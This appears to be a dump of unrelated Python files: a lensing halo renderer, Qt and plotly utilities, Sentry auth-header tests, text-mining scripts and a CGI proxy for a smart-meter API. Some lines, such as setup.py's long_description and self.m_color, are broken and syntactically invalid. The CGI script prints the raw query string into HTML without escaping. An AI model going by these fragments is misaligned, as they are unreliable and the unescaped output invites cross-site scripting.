np.argmin(abs(np.array(self._lens_plane_redshifts) - self.lens_cosmo.z_lens)) delta_z = self._delta_z_list[idx] m = self.render_masses_at_z(self.lens_cosmo.z_lens, delta_z) x, y = self.render_positions_at_z(self.lens_cosmo.z_lens, len(m)) subhalo_flag = [False] * len(m) redshifts = [self.lens_cosmo.z_lens] * len(m) r3d = np.array([None] * len(m)) return m, x, y, r3d, redshifts, subhalo_flag def render_masses_at_z(self, z, delta_z): """ :param z: redshift at which to render masses :param delta_z: thickness of the redshift slice :return: halo masses at the desired redshift in units Msun """ norm, slope = self._norm_slope(z, delta_z) args = deepcopy(self._rendering_kwargs) log_mlow, log_mhigh = self._redshift_dependent_mass_range(z, args['log_mlow'], args['log_mhigh']) mfunc = GeneralPowerLaw(log_mlow, log_mhigh, slope, args['draw_poisson'], norm, args['log_mc'], args['a_wdm'], args['b_wdm'], args['c_wdm']) m = mfunc.draw() return m def render_positions_at_z(self, z, nhalos): """ :param z: redshift :param nhalos: number of halos or objects to generate :return: the x, y coordinate of objects in arcsec, and a 3 dimensional coordinate in kpc The 3d coordinate only has a clear physical interpretation for subhalos, and is used to compute truncation raddi. For line of sight halos it is set to None. """ x_kpc, y_kpc = self.spatial_distribution_model.draw(nhalos, z) if len(x_kpc) > 0: kpc_per_asec = self.geometry.kpc_per_arcsec(z) x_arcsec = x_kpc * kpc_per_asec ** -1 y_arcsec = y_kpc * kpc_per_asec ** -1 return x_arcsec, y_arcsec else: return np.array([]), np.array([]) def _norm_slope(self, z, delta_z): """ This method computes the normalization of the mass function for correlated structure around the main deflector. The normalization is defined as (boost - 1) * background, where background is the mean normalization of the halo mass function computed with (for example) Sheth-Tormen, and boost is the average contribution of the two-halo term integrated over a comoving distance corresponding to 2 * dz, where dz is the redshift plane spacing. boost(z, r_min, r_max) = 2 / r_max int_{r_min}^{r_max} x(r, z, M_{host}) * dr where xi(r, M_{host) is the linear halo bias times the matter-matter correlation function, r_min is set of 0.5 Mpc, and r_max is the comoving distance corresponding to 2*dz, where dz is the redshift spacing. M_host is the mass in M_sun of the host dark matter halo :param z: the redshift which to evaluate the matter-matter correlation function and halo bias :param delta_z: the redshift spacing of the lens planes adjacent the main deflector :return: the normalization of the two-halo term mass function. The form of the two-halo term mass function is assumed to have the same shape as the background halo mass function """ if z != self.lens_cosmo.z_lens: raise Exception('this class must be evaluated at the main deflector redshift') volume_element_comoving = self.geometry.volume_element_comoving(z, delta_z) plaw_index = self.halo_mass_function.plaw_index_z(z) + self._rendering_kwargs['delta_power_law_index'] norm_per_unit_volume = self.halo_mass_function.norm_at_z_density(z, plaw_index, self._rendering_kwargs['m_pivot']) norm_per_unit_volume *= self._rendering_kwargs['LOS_normalization'] reference_norm = norm_per_unit_volume * volume_element_comoving rmax = self.lens_cosmo.cosmo.D_C_transverse(z + delta_z) - self.lens_cosmo.cosmo.D_C_transverse(z) rmin = min(rmax, 0.5) two_halo_boost = self.halo_mass_function.two_halo_boost(self._rendering_kwargs['host_m200'], z, rmax=rmax, rmin=rmin) slope = self.halo_mass_function.plaw_index_z(z) + self._rendering_kwargs['delta_power_law_index'] norm = (two_halo_boost - 1) * reference_norm return norm, slope def convergence_sheet_correction(self, *args, **kwargs): return {}, [], [] @staticmethod def keyword_parse_render(keywords_master): kwargs = {} required_keys = ['log_mlow', 'log_mhigh', 'host_m200', 'LOS_normalization', 'draw_poisson', 'delta_power_law_index', 'm_pivot', 'log_mc', 'a_wdm', 'b_wdm', 'c_wdm'] for key in required_keys: if key not in keywords_master: raise Exception('Required keyword argument ' + str(key) + ' not specified.') else: kwargs[key] = keywords_master[key] return kwargs def keys_convergence_sheets(self): return {}
from __future__ import absolute_import from .affine import * from .crop import * from .flip import * from .geometric import * from .group import * from .intensity import * from .temporal import *
############################################################################### # Module: ddl_statement # Purpose: Parent class for DDL (Data Definition Language) statements # # Notes: # ############################################################################### import data_pipeline.constants.const as const from abc import ABCMeta, abstractmethod from .base_statement import BaseStatement class DdlStatement(BaseStatement): """Contains data necessary for producing a valid DDL statement""" __metaclass__ = ABCMeta def __init__(self, table_name): super(DdlStatement, self).__init__(table_name) self._entries = [] @property def entries(self): return self._entries @abstractmethod def add_entry(self, **kwargs): pass def _build_field_params(self, params): if params: return "({})".format(const.COMMASPACE.join(params)) return const.EMPTY_STRING def _build_field_string(self, value): return " {}".format(value if value else const.EMPTY_STRING)
33. Python Programs/
<reponame>Ujjawalgupta42/Hacktoberfest2021-DSA for i in range(int(input())): fact=1 a=int(input()) for j in range(1,a+1,1): fact=fact*j print(fact) def factorial(n): return 1 if (n==1 or n==0) else n * factorial(n - 1); num = int(input('Enter number')) print("Factorial of",num,"is", factorial(num))
<reponame>GhalebKhaled/django-users-plus from __future__ import unicode_literals import django.test import django.contrib.admin import logging from .. import admin from test_models import (UnitTestCompany, UnitTestUser, UnitTestAuditLogEvent, ) logging.disable(logging.CRITICAL) @django.contrib.admin.register(UnitTestCompany) class UnitTestCompanyAdmin(admin.BaseCompanyAdmin): pass @django.contrib.admin.register(UnitTestUser) class UnitTestUserAdmin(admin.BaseUserAdmin): pass @django.contrib.admin.register(UnitTestAuditLogEvent) class UnitTestAuditLogEventAdmin(admin.BaseAuditLogEventAdmin): pass
from app import app if __name__ == '__main__': app = app.Session()
<filename> X = int(input()) a_list = [] for s in range(1, 32): for i in range(2, 10): a = s ** i if a > 1000: break a_list.append(a) a2 = sorted(list(set(a_list)), reverse=True) for n in a2: if n <= X: print(n) break
import sys import setuptools sys.path.insert(0, "src") import pytorch_adapt with open("", "r") as fh: long_description = extras_require_ignite = ["pytorch-ignite == 0.5.0.dev20220221"] extras_require_lightning = ["pytorch-lightning"] extras_require_record_keeper = ["record-keeper >= 0.9.31"] extras_require_timm = ["timm"] extras_require_docs = [ "mkdocs-material", "mkdocstrings[python]", "griffe", "mkdocs-gen-files", "mkdocs-section-index", "mkdocs-literate-nav", ] extras_require_dev = ["black", "isort", "nbqa", "flake8"] setuptools.setup( name="pytorch-adapt", version=pytorch_adapt.__version__, author="<NAME>", description="Domain adaptation made easy. Fully featured, modular, and customizable.", long_description=long_description, long_description_content_type="text/markdown", url="", package_dir={"": "src"}, packages=setuptools.find_packages(where="src"), classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], python_requires=">=3.0", install_requires=[ "numpy", "torch", "torchvision", "torchmetrics", "pytorch-metric-learning >= 1.3.1.dev0", ], extras_require={ "ignite": extras_require_ignite, "lightning": extras_require_lightning, "record-keeper": extras_require_record_keeper, "timm": extras_require_timm, "docs": extras_require_docs, "dev": extras_require_dev, }, )
data processing/
<gh_stars>0 import json import thulac import time # n # all+n (all 不包含 vm) # a+n # np 人名 # ns 地名 # ni 机构名 # nz 其它专名 # t和r 时间和代词该步不用加,但是在命名实体识别时需要考虑(这里做个备注) # i 习语 # j 简称 # x 其它 # 不能含有标点w def nowok(s): #当前词的词性筛选 if s=='n' or s=='np' or s=='ns' or s=='ni' or s=='nz': return True if s=='i' or s=='j' or s=='x' or s=='id' or s=='g' or s=='t': return True if s=='t' or s=='m': return True return False def judge(s): #含有非中文和英文,数字的词丢弃 num_count = 0 for ch in s: if u'\u4e00' <= ch <= u'\u9fff': pass elif '0' <= ch <= '9': num_count += 1 pass elif 'a' <= ch <= 'z': pass elif 'A' <= ch <= 'Z': pass else: return False if num_count == len(s): ##如果是纯数字,丢弃 return False return True # 给定分词结果,提取NER def createWordList(x): i = 0 n = len(x) L = [] while i < n: if judge(x[i][0]) == False : i += 1 continue; if nowok(x[i][1]): L.append(x[i][0]) i += 1 return L def createTable(num): start = time.time() thu = thulac.thulac() file = open('agri_economic.json', encoding='utf-8') print("begin!") f = json.load(file) count = 0 file_text = "" for p in f: count += 1 if int(count/100) != num: continue if count % 10 == 0: cur = time.time() print("now id : " + str(count) + " table size :" ) print("Running Time : " + str(int(cur-start)) + " s......") detail = p['detail'] # if len(detail) > 600: # detail = detail[0:600] title = p['title'] # 分词 text = thu.cut(detail) wordList = createWordList(text) file_text += title for word in wordList: file_text += ' ' + word file_text += '\n' file_object = open('article'+str(num)+".txt",'w') file_object.write(file_text) file_object.close() createTable(0) #createTable(1) #createTable(2) #createTable(3) #createTable(4) #createTable(5) #createTable(6) #createTable(7) #createTable(8) #createTable(9) #test() #def test(): # thu = thulac.thulac() # detail = "指在干旱、半干旱地区依靠自然降水栽培小麦。" # text = thu.cut(detail) # for x in text: # print(x[1]) #
##−∗−coding : utf−8−∗− import sqlite3 as lite import logging import sys from collections import OrderedDict import conf LOG_FORMAT = "%(levelname)s > Line:%(lineno)s - %(message)s" logging.basicConfig(filename="debug.log", level=logging.DEBUG, format=LOG_FORMAT, filemode="w", ) logger = logging.getLogger(__name__) # encode: string -> byte # unicode.encode() -> bytes # decode: bytes -> string # bytes.decode() -> unicode # no need to encoding or decode def decode_to_text(text): if isinstance(text, str): print(text) if "সময়" == text: logger.debug(str(text.encode('utf-8'))) logger.debug(str("সময়".encode('utf-8'))) logger.debug(str("সময়".encode('utf-8'))) # decode_text = text.encode('utf-8').decode('utf-8') decode_text = text else: decode_text = text return decode_text def convert_into_dic(columns, rows): """ Return query value into dictionary :type columns: list :type rows: tuple """ column_name = None row_val = None query_val = OrderedDict() length_c = len(columns) for c in range(0,length_c): column_name = columns[c] query_val[column_name] = [] # create key name with empty list value for r in range(0,len(rows)): row_val = decode_to_text(rows[r][c]) query_val[column_name].append(row_val) return query_val def run_query(query): """ Return query result sql: rawstring of sql """ con = None data = None try: con = lite.connect('VoiceCommand.db') cur = con.cursor() cur.execute(query) # TODO: Simplified it if True in map(lambda x: x.lower() in query.lower(),['update','insert','delete']): conf.NEW_COMMAND = True data = cur.fetchall() print(data) if cur.description: column_name = [c[0] for c in cur.description] if data: data = convert_into_dic(column_name, data) con.commit() except lite.Error as e: print("Error {}:".format(e.args[0])) sys.exit(1) finally: if con: con.close() return data
""" Receiving Open Sound Control messages as audio streams **** This script shows a granulation process controlled by OSC messages coming from another program (run the next example, **, to get values coming in). """ from pyo import * s = Server().boot() # The sound table to granulate. table = SndTable("../snds/flute.aif") # Listen addresses '/density', '/position', '/pitch_rand' and '/duration' on port 9000. rec = OscReceive(port=9000, address=["/density", "/position", "/pitch_rand", "/duration"]) # Sets initial values for the OSC streams. This allow the program to run with # minimal behaviour even if no message have been sent on these addresses. rec.setValue("/density", 0.5) rec.setValue("/position", 0.5) rec.setValue("/pitch_rand", 0.0) rec.setValue("/duration", 0.5) # Density of grains, between 1 and 250 grains per second. dens = SigTo(rec["/density"], time=0.05, mul=249, add=1) # Reading position, in samples, in the table + little jitter noise. pos = SigTo(rec["/position"], time=0.05, mul=table.getSize(), add=Noise(100)) # Amplitude of a jitter noise around 1.0 to control the pitch of individual grains. rpit = SigTo(rec["/pitch_rand"], time=0.05, mul=0.2, add=0.001) pit = Noise(mul=rpit, add=1) # Grain duration, between 0.025 and 0.5 second. dur = SigTo(rec["/duration"], time=0.05, mul=0.475, add=0.025) grain = Particle( table=table, # table to read samples from. env=HannTable(), # grain envelope. dens=dens, # density of grains per second. pitch=pit, # pitch of grains. pos=pos, # position in the table where to start the grain. dur=dur, # grain duration. dev=0.01, # Maximum deviation of the starting time of the grain. pan=Noise(0.5, 0.5), # Panning factor of the grain. chnls=2, # Number of channels to output. mul=0.15, ).out() s.gui(locals())
<gh_stars>0 """ Write a program that reads a value in meters and displays it converted to centimeters and millimeters """ m = float(input('Uma distância em metros: ')) """Kilometre --> Divide the length value by 1000""" km = m / 1000 """Hectometre --> Divide the length value by 100""" hm = m / 100 """Decametre --> Divide the length value by 10""" dam = m / 10 """Decimetre --> Multiply the length value by 10""" dm = m * 10 """Centimetre --> Multiply the length value by 100""" cm = m * 100 """Millimetre --> Multiply the length value by 1000""" mm = m * 1000 print('A medida de {}m corresponde a\n{}km\n{}hm\n{}dam\n{}dm\n{}cm\n{}mm'.format(m, km, hm, dam, dm, cm, mm))
<gh_stars>0 # 以下ほぼ彩花ちゃんのコピペ """import requests headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36'} url_1 = '' url_2 = '' url_3 = '' url_4 = '' url_5 = '' r_1 = requests.get(url_1, headers= headers) r_2 = requests.get(url_2, headers= headers) r_3 = requests.get(url_3, headers= headers) r_4 = requests.get(url_4, headers= headers) r_5 = requests.get(url_5, headers= headers) content_1 = r_1.content content_2 = r_2.content content_3 = r_3.content content_4 = r_4.content content_5 = r_5.content import io import zipfile f_1 = io.BytesIO(content_1) f_2 = io.BytesIO(content_2) f_3 = io.BytesIO(content_3) f_4 = io.BytesIO(content_4) f_5 = io.BytesIO(content_5) zipf_1 = zipfile.ZipFile(f_1) zipf_2 = zipfile.ZipFile(f_2) zipf_3 = zipfile.ZipFile(f_3) zipf_4 = zipfile.ZipFile(f_4) zipf_5 = zipfile.ZipFile(f_5) namelist_1 = zipf_1.namelist() namelist_2 = zipf_2.namelist() namelist_3 = zipf_3.namelist() namelist_4 = zipf_4.namelist() namelist_5 = zipf_5.namelist() namelist_1 namelist_2 namelist_3 namelist_4 namelist_5 import re title = '' author = '' def syori(text,first_sentence,last_sentence): #title, text = text.split('【テキスト中に現れる記号について】') #print(title) _, text = text.split(first_sentence) text, _ = text.split(last_sentence) text = first_sentence + text + last_sentence text = text.replace('|', '').replace(' ', '') text = re.sub('《\w+》', '', text) text = re.sub('[#.*]','', text) text = text.replace('\r','').replace('\n','') text = re.sub('[、「」?]', '', text) text = re.sub('\(\w+\)', '', text) text = re.sub('\[\w+\]', '', text) text = re.sub('[ \t]+$','',text) text = re.sub('^[ \t]+$','',text) text = re.sub('^ +$','',text) text = re.sub('[ ]+','',text) text = text.split('。') return text #info = {} def make_info(btext,atext): list = btext.splitlines() #print(list[0]) #print(list[1]) #print(btext[:10]) #print('\n') #print(atext[:10]) info={} for sentence in atext: #print(sentence) info[sentence]=list[:2] return info print("loading......") ########################################### data_1 =[0]) original_text_1 = data_1.decode('Shift_JIS') #print(original_text_1[:500]) #title, _ = original_text_1.split('【テキスト中に現れる記号について】') #title, _ = title.split('-------------------------------------------------------') #list = title.splitlines() #print(list[1]) #print(text) #sentences_1 = text.split('。') first_sentence = '私は、その男の写真を三葉、見たことがある。' last_sentence = '神様みたいないい子でした' sentences_1 = syori(original_text_1,first_sentence,last_sentence) info = make_info(original_text_1,sentences_1) # print('文の数:', len(sentences_1)) # print(sentences_1[:10]) #print(info['私は、その男の写真を三葉、見たことがある。']) #print(info) ########################################### data_2 =[0]) original_text_2 = data_2.decode('Shift_JIS') #print(original_text[:500]) first_sentence = '朝、食堂でスウプを一さじ、すっと吸ってお母さまが、' last_sentence = 'ぜひお聞きいれのほど願います。' #print(text) sentences_2 = syori(original_text_2,first_sentence,last_sentence) # print('文の数:', len(sentences_2)) #print(type(sentences_1[0])) # print(sentences_2[:10]) info.update(make_info(original_text_2,sentences_2)) #print(type(text)) #print(info) ########################################## data_3 =[0]) original_text_3 = data_3.decode('Shift_JIS') #print(original_text[:500]) first_sentence = 'メロスは激怒した。必ず、' last_sentence = '勇者は、ひどく赤面した。' #print(text) sentences_3 = syori(original_text_3,first_sentence,last_sentence) # print('文の数:', len(sentences_3)) #print(type(sentences_1[0])) # print(sentences_3[:10]) # print(type(sentences_3[0])) info.update(make_info(original_text_3,sentences_3)) ########################################## data_4 =[0]) original_text_4 = data_4.decode('Shift_JIS') #print(original_text[:500]) first_sentence = '伊豆の南、温泉が湧き出ているというだけで、他には何一つとるところの無い、つまらぬ山村である。' last_sentence = '何をしている事やら。' sentences_4 = syori(original_text_4,first_sentence,last_sentence) # print('文の数:', len(sentences_4)) #print(type(sentences_1[0])) # print(sentences_4[:10]) #print(type(text)) info.update(make_info(original_text_4,sentences_4)) ########################################## data_5 =[0]) original_text_5 = data_5.decode('Shift_JIS') #print(original_text[:500]) first_sentence = '富士の頂角、広重《ひろしげ》の富士は八十五度、文晁《ぶんてう》の富士も八十四度くらゐ、' last_sentence = '酸漿《ほほづき》に似てゐた。' #print(text) sentences_5 = syori(original_text_5,first_sentence,last_sentence) # print('文の数:', len(sentences_5)) #print(type(sentences_1[0])) # print(sentences_5[:10]) #print(type(text)) sentences_list = [sentences_1,sentences_2,sentences_3,sentences_4,sentences_5] # print(type(sentences_list)) info.update(make_info(original_text_5,sentences_5)) #################################################################### #ここは関数化しない方がいいのかな... viewsよくわからん from janome.tokenizer import Tokenizer BEGIN = '__BEGIN__' END = '__END__' #after_list = [] t = Tokenizer() gokan_dict={} for sentences in sentences_list: for sentence in sentences: for gokan in [token.base_form for token in t.tokenize(sentence)]: if gokan_dict.get(gokan)==None: gokan_dict[gokan]=[sentence] else: gokan_dict[gokan].append(sentence) class pycolor: BLACK = '\033[30m' RED = '\033[31m' GREEN = '\033[32m' YELLOW = '\033[33m' BLUE = '\033[34m' PURPLE = '\033[35m' CYAN = '\033[36m' WHITE = '\033[37m' RETURN = '\033[07m' #反転 ACCENT = '\033[01m' #強調 FLASH = '\033[05m' #点滅 RED_FLASH = '\033[05;41m' #赤背景+点滅 END = '\033[0m' import os import csv def search(param): # param = input() from dictionary import make_synonym_dict synonym_dict = {} synonym_dict=make_synonym_dict(param) datas = [] for synonym in synonym_dict[param]: if gokan_dict.get(synonym): for sentence in gokan_dict[synonym]: words=t.tokenize(sentence) words=list(words) #b=False #text1 = "" #text2 = "" for word in words: if word.base_form==synonym: #b=True param2=word.surface text_list = sentence.split(word.surface) break datas.append(text_list[0]+param2+text_list[1]+':'+info[sentence][0]+','+info[sentence][1]) # 色付き datas.append(text_list[0]+pycolor.BLUE+param2+pycolor.END+text_list[1]+':'+info[sentence][0]+','+info[sentence][1]) # print(text_list[0]+pycolor.BLUE+param2+pycolor.END+text_list[1]+':'+info[sentence][0]+','+info[sentence][1]) with open(os.getcwd()+'/polls/application/'+'data.csv','a') as f: writer = csv.writer(f, lineterminator='\n,') writer.writerow(datas) # writer.writerow("DONE")""" import os import csv import random #from dictionary import make_synonym_dict def search(param): #from janome.tokenizer import Tokenizer #t = Tokenizer() #print(param2) print("search:") print(param) def flatten(nested_list): """2重のリストをフラットにする関数""" return [e for inner_list in nested_list for e in inner_list] def search2(param): param2 = '"' + param + '":' gokan_sentence_list = [] print(os.getcwd()) with open(os.getcwd()+'/'+'akutagawa_gokan_dict.tsv', encoding = 'utf-8')as f: print("開けた!") for line in f: #print(line) #t = 0 if param2 in line: _,line = line.split(param2) gokan_sentence_list = line.split('\t') #t = random.randint(0,len(gokan_sentence_list)-1) break print(gokan_sentence_list) print("aaa") if gokan_sentence_list!=[]: return random.choice(gokan_sentence_list) else: return "" gokan_sentence_list = [] gokan_sentence_list.append(search2(param)) #print(gokan_dict) synonym_dict = {} #synonym_dict=make_synonym_dict(param) #print(synonym_dict) with open(os.getcwd()+'/'+'akutagawa_synonym_dict.tsv', encoding = 'utf-8')as f: param2 = '"'+param+'":' for line in f: if param2 in line: _,line = line.split(param2) synonym_dict[param] = line.split('\t') for synonym in synonym_dict[param]: #print(synonym) gokan_sentence_list.append(search2(synonym)) #if gokan_dict.get(synonym): #for sentence in gokan_sentence_list: with open(os.getcwd()+'/'+'data.csv','a') as f: for sentence in gokan_sentence_list: f.write(sentence + '::::::::::') #writer.writerow(gokan_sentence_list) # writer.writerow("DONE")""" # 以下を追記(return_text()を呼び出すと"Hello!!"が返される) def return_text(): #return "Hello!" with open(os.getcwd()+'/'+'data.csv') as f: reader = csv.reader(f, lineterminator='\n,') datas = [] for row in reader: # print(row) datas.append(row) os.remove(os.getcwd()+'/'+'data.csv') return datas """ with open(os.getcwd()+'/polls/application/'+'data.csv','a') as f: reader = csv.reader(f, lineterminator='\n') datas = [] for row in reader: datas.append(row) return datas """ """ テスト用 # coding:utf-8 import os import csv # htmlからのデータをcsvファイルに記録 def search(data): print("dataだよ") datas = [data] with open(os.getcwd()+'/polls/application/'+'data.csv','a') as f: writer = csv.writer(f, lineterminator='\n') writer.writerow(datas) """
<reponame>pajotca/CityEnergyAnalyst<filename>cea/plots/optimization/ from __future__ import division from __future__ import print_function import plotly.graph_objs as go from plotly.offline import plot from cea.plots.variable_naming import LOGO, COLOR, NAMING def pareto_capacity_installed(data_frame, analysis_fields, title, output_path): # CALCULATE GRAPH traces_graph = calc_graph(analysis_fields, data_frame) # CALCULATE TABLE traces_table = calc_table(analysis_fields, data_frame) # PLOT GRAPH traces_graph.append(traces_table) layout = go.Layout(images=LOGO, title=title, barmode='stack', yaxis=dict(title='Power Capacity [kW]', domain=[.35, 1]), xaxis=dict(title='Point in the Pareto Curve')) fig = go.Figure(data=traces_graph, layout=layout) plot(fig, auto_open=False, filename=output_path) return {'data': traces_graph, 'layout': layout} def calc_table(analysis_fields, data_frame): # analysis of renewable energy share data_frame['load base unit'] = calc_top_three_technologies(analysis_fields, data_frame, analysis_fields) table = go.Table(domain=dict(x=[0, 1], y=[0, 0.2]), header=dict(values=['Individual ID', 'Building connectivity [%]', 'Load Base Unit']), cells=dict(values=[data_frame.index, data_frame['Buildings Connected Share'].values, data_frame['load base unit'].values])) return table def calc_graph(analysis_fields, data): # CALCULATE GRAPH FOR CONNECTED BUILDINGS graph = [] data['total'] = data[analysis_fields].sum(axis=1) data['Name'] = data.index.values data = data.sort_values(by='total', ascending=False) # this will get the maximum value to the left for field in analysis_fields: y = data[field] flag_for_unused_technologies = all(v == 0 for v in y) if not flag_for_unused_technologies: name = NAMING[field] total_perc = (y / data['total'] * 100).round(2).values total_perc_txt = ["(" + str(x) + " %)" for x in total_perc] trace = go.Bar(x=data['Name'], y=y, text=total_perc_txt, name = name, marker=dict(color=COLOR[field])) graph.append(trace) # CALCULATE GRAPH FOR DISCONNECTED BUILDINGS return graph def calc_building_connected_share(network_string): share = round(sum([int(x) for x in network_string]) / len(network_string) * 100, 0) return share def calc_renewable_share(all_fields, renewable_sources_fields, dataframe): nominator = dataframe[renewable_sources_fields].sum(axis=1) denominator = dataframe[all_fields].sum(axis=1) share = (nominator / denominator * 100).round(2) return share def calc_top_three_technologies(analysis_fields, data_frame, fields): top_values = [] data = data_frame[analysis_fields] for individual in data.index: top_values.extend(data.ix[individual].sort_values(ascending=False)[:1].index.values) # change name top_values = [x.split('_capacity', 1)[0] for x in top_values] return top_values
#!/usr/bin/env python """ Author: <NAME> <<EMAIL>> License: LGPL Note: I've licensed this code as LGPL because it was a complete translation of the code found here... Adapted to spectrochempy_gui """ import sys from spectrochempy_gui.pyqtgraph.Qt import QtCore, QtGui, QtWidgets class QProgressIndicator(QtGui.QWidget): m_angle = None m_timerId = None m_delay = None m_displayedWhenStopped = None m_color = None def __init__(self, parent): # Call parent class constructor first super().__init__(parent) # Initialize Qt Properties self.setProperties() # Intialize instance variables self.m_angle = 0 self.m_timerId = -1 self.m_delay = 40 self.m_displayedWhenStopped = False self.m_color = # Set size and focus policy self.setSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed) self.setFocusPolicy(QtCore.Qt.NoFocus) # Show the widget def animationDelay(self): return self.delay def isAnimated(self): return (self.m_timerId != -1) def isDisplayedWhenStopped(self): return self.displayedWhenStopped def getColor(self): return self.color def sizeHint(self): return QtCore.QSize(20, 20) def startAnimation(self): self.m_angle = 0 if self.m_timerId == -1: self.m_timerId = self.startTimer(self.m_delay) def stopAnimation(self): if self.m_timerId != -1: self.killTimer(self.m_timerId) self.m_timerId = -1 self.update() def setAnimationDelay(self, delay): if self.m_timerId != -1: self.killTimer(self.m_timerId) self.m_delay = delay if self.m_timerId != -1: self.m_timerId = self.startTimer(self.m_delay) def setDisplayedWhenStopped(self, state): self.displayedWhenStopped = state self.update() def setColor(self, color): self.m_color = color self.update() def timerEvent(self, event): self.m_angle = (self.m_angle + 30) % 360 self.update() def paintEvent(self, event): if (not self.m_displayedWhenStopped) and (not self.isAnimated()): return width = min(self.width(), self.height()) painter = QtGui.QPainter(self) painter.setRenderHint(QtGui.QPainter.Antialiasing) outerRadius = (width - 1) * 0.5 innerRadius = (width - 1) * 0.5 * 0.38 capsuleHeight = outerRadius - innerRadius capsuleWidth = capsuleHeight * .23 if (width > 32) else capsuleHeight * .35 capsuleRadius = capsuleWidth / 2 for i in range(0, 12): color = QtGui.QColor(self.m_color) if self.isAnimated(): color.setAlphaF(1.0 - (i / 12.0)) else: color.setAlphaF(0.2) painter.setPen(QtCore.Qt.NoPen) painter.setBrush(color) painter.translate(self.rect().center()) painter.rotate(self.m_angle - (i * 30.0)) painter.drawRoundedRect(capsuleWidth * -0.5, (innerRadius + capsuleHeight) * -1, capsuleWidth, capsuleHeight, capsuleRadius, capsuleRadius) painter.restore() def setProperties(self): self.delay = QtCore.pyqtProperty(int, self.animationDelay, self.setAnimationDelay) self.displayedWhenStopped = QtCore.pyqtProperty(bool, self.isDisplayedWhenStopped, self.setDisplayedWhenStopped) self.color = QtCore.pyqtProperty(QtGui.QColor, self.getColor, self.setColor) def TestProgressIndicator(): app = QtGui.QApplication(sys.argv) progress = QProgressIndicator(None) progress.setAnimationDelay(70) progress.startAnimation() # Execute the application sys.exit(app.exec_()) if __name__ == "__main__": TestProgressIndicator()
<reponame>uandco/sentry from __future__ import absolute_import import mock import pytest from django.core.exceptions import SuspiciousOperation from sentry.coreapi import ClientAuthHelper, APIUnauthorized def test_valid(): helper = ClientAuthHelper() request = mock.Mock() request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value, biz=baz'} request.GET = {} result = helper.auth_from_request(request) assert result.public_key == 'value' def test_valid_missing_space(): helper = ClientAuthHelper() request = mock.Mock() request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value,biz=baz'} request.GET = {} result = helper.auth_from_request(request) assert result.public_key == 'value' def test_valid_ignore_case(): helper = ClientAuthHelper() request = mock.Mock() request.META = {'HTTP_X_SENTRY_AUTH': 'SeNtRy sentry_key=value, biz=baz'} request.GET = {} result = helper.auth_from_request(request) assert result.public_key == 'value' def test_invalid_header_defers_to_GET(): helper = ClientAuthHelper() request = mock.Mock() request.META = {'HTTP_X_SENTRY_AUTH': 'foobar'} request.GET = {'sentry_version': '1', 'foo': 'bar'} result = helper.auth_from_request(request) assert result.version == '1' def test_invalid_legacy_header_defers_to_GET(): helper = ClientAuthHelper() request = mock.Mock() request.META = {'HTTP_AUTHORIZATION': 'foobar'} request.GET = {'sentry_version': '1', 'foo': 'bar'} result = helper.auth_from_request(request) assert result.version == '1' def test_invalid_header_bad_token(): helper = ClientAuthHelper() request = mock.Mock() request.META = {'HTTP_X_SENTRY_AUTH': 'Sentryfoo'} request.GET = {} with pytest.raises(APIUnauthorized): helper.auth_from_request(request) def test_invalid_header_missing_pair(): helper = ClientAuthHelper() request = mock.Mock() request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry foo'} request.GET = {} with pytest.raises(APIUnauthorized): helper.auth_from_request(request) def test_invalid_malformed_value(): helper = ClientAuthHelper() request = mock.Mock() request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value,,biz=baz'} request.GET = {} with pytest.raises(APIUnauthorized): helper.auth_from_request(request) def test_multiple_auth_suspicious(): helper = ClientAuthHelper() request = mock.Mock() request.GET = {'sentry_version': '1', 'foo': 'bar'} request.META = {'HTTP_X_SENTRY_AUTH': 'Sentry sentry_key=value, biz=baz'} with pytest.raises(SuspiciousOperation): helper.auth_from_request(request)
<filename> #!/usr/bin/python # Copyright 2020 by <NAME>, n3rgy data ltd. # All rights reserved. # # Sample script to interact with service # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" basis, # WITHOUT WARRANTIES OF ANY KIND, either express or implied. # import json, cgi, requests, os import base64, urllib print "Content-type: text/html\n\n" form = cgi.FieldStorage() # # fetch cookies for apiKey and service type (live/sandbox) # url = "" AUTH = "" handler = {} if 'HTTP_COOKIE' in os.environ: cookies = os.environ['HTTP_COOKIE'] cookies = cookies.split('; ') for cookie in cookies: cookie = cookie.split('=') handler[cookie[0]] = cookie[1] if handler['n3rgyConsumerAuthorization']: AUTH = handler['n3rgyConsumerAuthorization'] durl = "/cgi-bin/" headers = {'Authorization': AUTH} path_info = os.environ.get("PATH_INFO") if path_info is None: path_info = "" querystring = os.environ.get("QUERY_STRING") if querystring is None: querystring = "" apiurl = url + path_info + "?" + querystring print '<html><head><link rel="stylesheet" href="/data/n3rgy.css"><body><img src=""></head><body bgcolor=#637381><h1>Consumer Smart Meter Data</h1><pre>' print "<b>n3rgy data API Call: </b> " + apiurl + "<p>" print "<b>n3rgy data API Response: </b><br>" # Fetch API data # rdata = requests.get( url=apiurl, headers=headers ) # Get JSON from response # [added support for output=csv parameter, just print if its not a json response] # try: r = rdata.json() except: print rdata.text print "</pre><p>" print "<h3><a href='..'>back</a></h3></body></html>" exit # Copy JSON to add HTML links # h = r.copy() # convert entries into HTML links (if there are any) # i=0 try: while i < len(r['entries']): h['entries'][i] = "<a href='" + durl + path_info + '/' + r['entries'][i] + "'>" + r['entries'][i] + "</a>" i=i+1 except: try: h['entries'] = "<a href='" + durl + path_info + '/' + str(r['entries'][0]) + "'>" + str(r['entries'][0]) + "</a>" except: x=1 print json.dumps(h, indent=2) print "</pre><p>" print "<h3><a href='..'>back</a></h3></body></html>"
